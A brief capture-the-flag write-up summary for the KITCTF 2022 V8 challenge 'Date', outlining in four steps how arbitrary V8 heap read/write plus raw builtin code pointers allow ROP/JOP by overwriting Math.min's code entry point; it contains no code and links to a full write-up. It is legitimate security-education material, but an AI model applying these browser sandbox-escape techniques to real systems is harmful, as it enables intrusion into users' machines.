Tags: v8 pwn kitctfctf exploitation chrome 

Rating:

The challenge is archived here: [https://2022.ctf.kitctf.de/challenges#Date-2](https://2022.ctf.kitctf.de/challenges#Date-2)

Solution tldr:
- Enabled Memory corruption API + v8 sandbox
- Arbitrary read/write inside the V8 heap
- JS_FUNCTION objects for builtins (e.g. Math.min, console.log, ...) still contain full raw pointers (not sandboxed yet) to the executable region of the d8 binary
- ROP+JOP with the gadgets in the d8 executable region by overwriting Math.min->code->code_entry_point

For a proper explanation, please refer to the full writeup: [https://ju256.de/posts/kitctfctf22-date/](https://ju256.de/posts/kitctfctf22-date/)

Original writeup (https://ju256.de/posts/kitctfctf22-date/).